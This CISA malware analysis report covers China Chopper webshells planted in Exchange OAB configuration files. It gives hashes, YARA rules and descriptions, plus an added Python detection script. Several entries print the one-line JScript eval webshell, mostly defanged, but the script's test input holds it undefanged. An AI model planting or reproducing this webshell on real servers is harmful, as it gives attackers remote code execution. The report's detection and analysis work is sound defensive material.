Malware Analysis Report (AR22-277C)

MAR-10365227-3.v1 China Chopper Webshells


Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts by the Cybersecurity and Infrastructure Security Agency (CISA) to provide detailed analysis of files associated with "China Chopper" webshells. CISA obtained China Chopper malware samples during an on-site incident response engagement at a Defense Industrial Base (DIB) Sector organization compromised by advanced persistent threat (APT) actors.

CISA analyzed 15 files associated with China Chopper malware. The files are Offline Address Book (OAB) Virtual Directory (VD) configuration files from Microsoft Exchange servers into which a variant of the China Chopper webshell has been written. The webshells allow an attacker to remotely access the server and execute arbitrary code on the system(s).

For more information on the confirmed compromise, see Joint CSA: Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization.

Download the STIX version of this report: MAR-10365227.r3.v1.WHITE_stix, 3.2 MB

Submitted Files (15)

07208095feb011ed915a881b689d6b70c352d40e90131df2c2abc92c4b93fbd9 (a96r741S.aspx)

1435e7871e32779a81e28aa9b6fa57949439220527ed3b3fb83a1c0699f376e3 (cBP0VKYG.aspx)

1e05b263cfea600f727614e58646a2ff6a4c89a4499e2410f23bf40c718a94d3 (ZyphzweO.aspx)

1f5f5b8dd702da3628e8612d44563d8267fa160048a0da389ee821152ac658f2 (nypCBAQf.aspx)

3918f060a7df3ef3488f4158b56cd720e1e4872f1c5a075df5870164260af650 (vsaUptfA.aspx)

411fef05a37e286a4e48700e5155cd55672cce4c9283b448d968391267b4f866 (pRd3rIlG.aspx)

53c7c1bf8526bb7a6d0af1fd7c7673a8138db90bb81b786f3987b9d854697f6c (vqk8w97H.aspx)

58a6151413f281143a9390852b017b82ff40d402cdbc8295aa58ae46c4c8424f (ydRlt1rF.aspx)

a58c4fdb1c31100f4e9bb530af7d1ac57c715fee1c7c5e6c790e1e9cc863cfe4 (0GPd9cCt.aspx)

a8c656d12b10d4fae74efc4cc7e585f5569f1a9144ebf6cd56b1bfed0dd7a440 (undMk5U9.aspx)

b8a06eae7d57a292dfea9000f76c6e3733b3567ef67d75b149dfd1d001ca9fb8 (AXYD37GQ.aspx)

dc21ee9606505222dbfe26d6bfc2a4dbebecf620d72fc39d298a5de519c3535f (PcyJLpmw.aspx)

dfa9f4a054636750012e0ff56286a3c96c37062959c8ac5b2df52e349de69e65 (GLuRqYO7.aspx)

e2caf75367ca300f616a96ff07769b1f80b69b1ae135fa27b79376a75a905b5e (mDweIri6.aspx)

e5451de048d7b9d6d8e699da7a10c38079eda4e6328580a8ba259a22eeaaa71d (vyBcbDLQ.aspx)

Findings

b8a06eae7d57a292dfea9000f76c6e3733b3567ef67d75b149dfd1d001ca9fb8

Tags

trojan, webshell

Details
Name AXYD37GQ.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 b5be2d3f0ebbb9a0925236f171c5b5e0
SHA1 1c2526572d10d3577802c15125d9c3a701c48919
SHA256 b8a06eae7d57a292dfea9000f76c6e3733b3567ef67d75b149dfd1d001ca9fb8
SHA512 3f5cd073f05c581c46973213e0aebaf3240c1336593901fc66abd3fb79ce70464d45d77629e5e88ec16a3d3fff9f4079807b41aa35401b5ba3ab63406484879c
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaXVMr6j71idfhphE5g8RMlF62E4ONF0qDe8+:kNrdepN1BXS0HM5QZphEGs4ONF0qi
Entropy 4.646463
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.A8133255
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.A8133255 (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.A8133255
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
           $s1 = { 65 76 61 6C 28 }
           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       condition:
           $s0 or ($s1 and $s2) or ($s3 and $s4)
    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
       condition:
           $s0 and $s1 and $s2
    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB virtual directory configuration file. The OAB VD is the IIS virtual directory through which Outlook clients download offline address lists. In this file the OAB ExternalUrl property has been modified by a remote operator to carry a "China Chopper" webshell, in a likely attempt to gain unauthorized, on-demand remote code execution against the Exchange server. Because the file carries an .aspx extension, once it sits in a web-accessible directory ASP.NET compiles and runs the server-side JScript embedded in the ExternalUrl value each time the page is requested, so the operator can submit arbitrary code to the server simply by issuing HTTP requests to this page.

In this file, the ExternalUrl designation that normally specifies the Uniform Resource Locator (URL) used to connect to the VD from outside the firewall has been replaced with the following code:

---Begin Webshell---
hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["47YyATOi91Po"],"unsafe");)</script>
---End Webshell---

The script passes whatever string the client supplies in the request parameter named "47YyATOi91Po" to the JScript eval function; the "unsafe" argument runs the evaluated code outside the restricted security context JScript .NET otherwise applies to eval, so it can use the full .NET Framework. The parameter name is the only gate, a shared secret rather than authentication: a request without a parameter of that name gives eval nothing to run, while anyone who knows the name can execute arbitrary code with the privileges of the IIS worker process hosting the page, which on Exchange servers is Local System.
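The two YARA rules quoted above and the ExternalUrl description together describe the detection: rule CISA_10328929_01 keys on the eval(Request[...],"unsafe") webshell body, rule CISA_10328929_02 on an OAB virtual directory property dump whose ExternalUrl points at a one-character host such as "f". The following Python script is an added example, not part of this report or of CISA's tooling: it ports both rules' hex strings to regexes, scans a constructed OAB VD property dump (an approximation of the Format-List layout these files take, not a real sample; the server name, the benign URL and the property values are made up, and only the key "47YyATOi91Po" is taken from the sample above), and extracts the request-parameter key the shell reads so a responder can hunt for that parameter name in IIS logs.

```python
"""Port of the two CISA YARA rules quoted in this report to Python, run over a
constructed Exchange OAB virtual directory property dump, with extraction of the
China Chopper request-parameter key. Example code, not part of the report."""
import re
from typing import List, NamedTuple, Optional

# A YARA byte jump such as [1-32] means "any 1 to 32 bytes": [\s\S]{1,32} in a
# bytes regex. The literals are the report's hex strings decoded to ASCII.
RULE01 = {  # CISA_10328929_01: webshell body
    "s0": re.compile(rb'eval\(Request\["[\s\S]{1,32}\],"unsafe"\)'),
    "s1": re.compile(rb"eval\("),
    "s2": re.compile(rb'\(Request\.Item\[[\s\S]{1,36}\]\)\),"unsafe"\)'),
    "s3": re.compile(rb"IO\.StreamWriter\(Request\.Form\[[\s\S]{1,24}\]"),
    "s4": re.compile(rb"Write\(Request\.Form\[[\s\S]{1,24}\]"),
}
RULE02 = {  # CISA_10328929_02: OAB VD dump whose ExternalUrl host is one character
    "s0": re.compile(rb"OfflineAddressBooks"),
    "s1": re.compile(rb": http://[\s\S]/"),
    "s2": re.compile(rb"ExternalUrl    "),
}
# The request-parameter name the shell reads its code from (its "key").
KEY_RE = re.compile(rb'eval\s*\(\s*Request\["([^"\]]{1,32})"\]\s*,\s*"unsafe"\s*\)')
EXTERNAL_URL_RE = re.compile(rb"^ExternalUrl\s*:\s*(.*?)\r?$", re.M)


def rule01_matches(data: bytes) -> bool:
    """Condition of CISA_10328929_01: $s0 or ($s1 and $s2) or ($s3 and $s4)."""
    m = {name: rx.search(data) is not None for name, rx in RULE01.items()}
    return m["s0"] or (m["s1"] and m["s2"]) or (m["s3"] and m["s4"])


def rule02_matches(data: bytes) -> bool:
    """Condition of CISA_10328929_02: $s0 and $s1 and $s2."""
    return all(rx.search(data) is not None for rx in RULE02.values())


class Verdict(NamedTuple):
    webshell_body: bool        # rule 01 fired
    oab_dump_with_shell: bool  # rule 02 fired
    keys: List[str]            # parameter names found in eval(Request["..."],"unsafe")
    external_url: Optional[bytes]


def scan(data: bytes) -> Verdict:
    ext = EXTERNAL_URL_RE.search(data)
    return Verdict(
        webshell_body=rule01_matches(data),
        oab_dump_with_shell=rule02_matches(data),
        keys=[k.decode() for k in KEY_RE.findall(data)],
        external_url=ext.group(1) if ext else None,
    )


def _vd_dump(external_url: str) -> bytes:
    """Constructed OAB VD property dump in the Format-List layout the report's
    files take (CRLF line endings). An approximation, not a real sample."""
    lines = [
        "OfflineAddressBooks            : {\\Default Offline Address Book}",
        "RequireSSL                     : True",
        "BasicAuthentication            : True",
        "WindowsAuthentication          : True",
        "Server                         : EXCH01",
        "InternalUrl                    : https://exch01.corp.example/OAB",
        f"ExternalUrl                    : {external_url}",
        "Name                           : OAB (Default Web Site)",
    ]
    return ("\r\n".join(lines) + "\r\n").encode()


# Constructed inputs: the first sample's shell, written the way the rule's $s0
# string expects it (no space between eval and its parenthesis), and a clean URL.
MALICIOUS = _vd_dump(
    'http://f/<script language="JScript" runat="server">'
    'function Page_Load(){eval(Request["47YyATOi91Po"],"unsafe");}</script>'
)
BENIGN = _vd_dump("https://mail.corp.example/OAB")

if __name__ == "__main__":
    for label, blob in (("constructed malicious", MALICIOUS), ("constructed benign", BENIGN)):
        print(label, scan(blob))
```

Run the file directly to print both verdicts. Rule 02 on its own flags any such dump whose ExternalUrl host is a single character, so treat it as a pivot for review; rule 01 firing, or a key being extracted, is the confirmation, and the extracted key is the string to search for in IIS request logs.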

Screenshots
Figure 1. -

53c7c1bf8526bb7a6d0af1fd7c7673a8138db90bb81b786f3987b9d854697f6c

Tags

trojan, webshell

Details
Name vqk8w97H.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 264b80ff5d873d630168f21892f27724
SHA1 ae0d3ca3f7bec5703f1bc554f9b57bcdda8022ba
SHA256 53c7c1bf8526bb7a6d0af1fd7c7673a8138db90bb81b786f3987b9d854697f6c
SHA512 7c3cee7a7151417b42eea859c8b5a5f01c9289f02a279d5874ed4ef2dfee15b9dfee012a4f1b050255883a6ce876e72db0047bb6519383d6b76e06f377c5918d
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaHVMr6j71idfhphE5gQaqt62E4ONF0qbenf:kNrdepN1BXS0nM5QZphEZfs4ONF0qS
Entropy 4.651647
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.46E1E12C
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.46E1E12C (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.46E1E12C
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
           $s1 = { 65 76 61 6C 28 }
           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       condition:
           $s0 or ($s1 and $s2) or ($s3 and $s4)
    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
       condition:
           $s0 and $s1 and $s2
    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB virtual directory configuration file. The OAB VD is the IIS virtual directory through which Outlook clients download offline address lists. In this file the OAB ExternalUrl property has been modified by a remote operator to carry a "China Chopper" webshell, in a likely attempt to gain unauthorized, on-demand remote code execution against the Exchange server. Because the file carries an .aspx extension, once it sits in a web-accessible directory ASP.NET compiles and runs the server-side JScript embedded in the ExternalUrl value each time the page is requested, so the operator can submit arbitrary code to the server simply by issuing HTTP requests to this page.

In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:

---Begin Webshell---
hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["gmetqypJ4TUw"],"unsafe");)</script>
---End Webshell---

The script passes whatever string the client supplies in the request parameter named "gmetqypJ4TUw" to the JScript eval function; the "unsafe" argument runs the evaluated code outside the restricted security context JScript .NET otherwise applies to eval, so it can use the full .NET Framework. The parameter name is the only gate, a shared secret rather than authentication: a request without a parameter of that name gives eval nothing to run, while anyone who knows the name can execute arbitrary code with the privileges of the IIS worker process hosting the page, which on Exchange servers is Local System.

Screenshots
Figure 2. -

dc21ee9606505222dbfe26d6bfc2a4dbebecf620d72fc39d298a5de519c3535f

Tags

trojan, webshell

Details
Name PcyJLpmw.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 d07539a27792c1a1d37dc0b7c5fa0f40
SHA1 82809edc726101e5baea2ae70bcd9cf2e20bdffa
SHA256 dc21ee9606505222dbfe26d6bfc2a4dbebecf620d72fc39d298a5de519c3535f
SHA512 bf9afaa2f2fe07708d17f8f5d73638e9df85301e714d7aeae302c14b17fbc3be619ac150330ee302b06bffd1d3b6fc8c1a16ebee62ed353ccf4c3ffcfa636c6c
ssdeep 24:yd53SzMaPfVMNGy1Qcz+rJdrde9j3yhm6jq6j71idfhphE5Jl+62E4ONF0qTenf:S53/gMyfrdepiz95QZphEfgs4ONF0q6
Entropy 4.649797
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.9109FA0F
ClamAV Asp.Trojan.Webshell0321-9840176-0
ESET ASP/Webshell.DI trojan
Emsisoft Generic.ASP.WebShell.H.9109FA0F (B)
Lavasoft Generic.ASP.WebShell.H.9109FA0F
McAfee Exploit-CVE2021-27065.d
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
           $s1 = { 65 76 61 6C 28 }
           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       condition:
           $s0 or ($s1 and $s2) or ($s3 and $s4)
    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
       condition:
           $s0 and $s1 and $s2
    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB virtual directory configuration file. The OAB VD is the IIS virtual directory through which Outlook clients download offline address lists. In this file the OAB ExternalUrl property has been modified by a remote operator to carry a "China Chopper" webshell, in a likely attempt to gain unauthorized, on-demand remote code execution against the Exchange server. Because the file carries an .aspx extension, once it sits in a web-accessible directory ASP.NET compiles and runs the server-side JScript embedded in the ExternalUrl value each time the page is requested, so the operator can submit arbitrary code to the server simply by issuing HTTP requests to this page.

In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:

---Begin Webshell---
hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["49tWiczXqjDb"],"unsafe");)</script>
---End Webshell---

The script passes whatever string the client supplies in the request parameter named "49tWiczXqjDb" to the JScript eval function; the "unsafe" argument runs the evaluated code outside the restricted security context JScript .NET otherwise applies to eval, so it can use the full .NET Framework. The parameter name is the only gate, a shared secret rather than authentication: a request without a parameter of that name gives eval nothing to run, while anyone who knows the name can execute arbitrary code with the privileges of the IIS worker process hosting the page, which on Exchange servers is Local System.

Screenshots
Figure 3. -

3918f060a7df3ef3488f4158b56cd720e1e4872f1c5a075df5870164260af650

Tags

trojan, webshell

Details
Name vsaUptfA.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 5cbd52c0a7517ddcd8a0e764131bd791
SHA1 f44cecce75f74b62a6596872b8dd86dbca2a59a8
SHA256 3918f060a7df3ef3488f4158b56cd720e1e4872f1c5a075df5870164260af650
SHA512 96a369b1d92385e1875ce64058c5875c27afdf10dc9163aa38a72a905b77202d17620f2b5ca269404d5f7f165c79b39ffff355a0834cf9d35944b28df4069230
ssdeep 48:kNrdepN1BXS0kwM5QZphEETs4ONF0qdwY:ktde/1yEANCqdwY
Entropy 4.647264
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.6D98F430
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.6D98F430 (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.6D98F430
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
           $s1 = { 65 76 61 6C 28 }
           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       condition:
           $s0 or ($s1 and $s2) or ($s3 and $s4)
    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
       condition:
           $s0 and $s1 and $s2
    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB virtual directory configuration file. The OAB VD is the IIS virtual directory through which Outlook clients download offline address lists. In this file the OAB ExternalUrl property has been modified by a remote operator to carry a "China Chopper" webshell, in a likely attempt to gain unauthorized, on-demand remote code execution against the Exchange server. Because the file carries an .aspx extension, once it sits in a web-accessible directory ASP.NET compiles and runs the server-side JScript embedded in the ExternalUrl value each time the page is requested, so the operator can submit arbitrary code to the server simply by issuing HTTP requests to this page.

In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:

---Begin Webshell---
hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["OUZz8HlharTm"],"unsafe");)</script>
---End Webshell---

The script passes whatever string the client supplies in the request parameter named "OUZz8HlharTm" to the JScript eval function; the "unsafe" argument runs the evaluated code outside the restricted security context JScript .NET otherwise applies to eval, so it can use the full .NET Framework. The parameter name is the only gate, a shared secret rather than authentication: a request without a parameter of that name gives eval nothing to run, while anyone who knows the name can execute arbitrary code with the privileges of the IIS worker process hosting the page, which on Exchange servers is Local System.

Screenshots
Figure 4. -

07208095feb011ed915a881b689d6b70c352d40e90131df2c2abc92c4b93fbd9

Tags

trojan, webshell

Details
Name a96r741S.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 bd01f935103002ccf3a21c9815697c24
SHA1 7517f601fc648bb731961d492b638f4d39e698fa
SHA256 07208095feb011ed915a881b689d6b70c352d40e90131df2c2abc92c4b93fbd9
SHA512 a38c05fa1814cebdfea51520eabf7c133d229b7c6aadd1792e2cffcd29d733c7d590411f6881573087c1fdc82e6293e32eab7cc42fe3b7c908ca0d4ca89f527e
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaVfVMr6j71idfhphE5gMPAF62E4ONF0qHenf:kNrdepN1BXS01M5QZphEJes4ONF0qe
Entropy 4.647271
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.CCB2735F
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.CCB2735F (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.CCB2735F
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
           $s1 = { 65 76 61 6C 28 }
           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       condition:
           $s0 or ($s1 and $s2) or ($s3 and $s4)
    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
       condition:
           $s0 and $s1 and $s2
    }
ssdeep Matches

No matches found.

Description

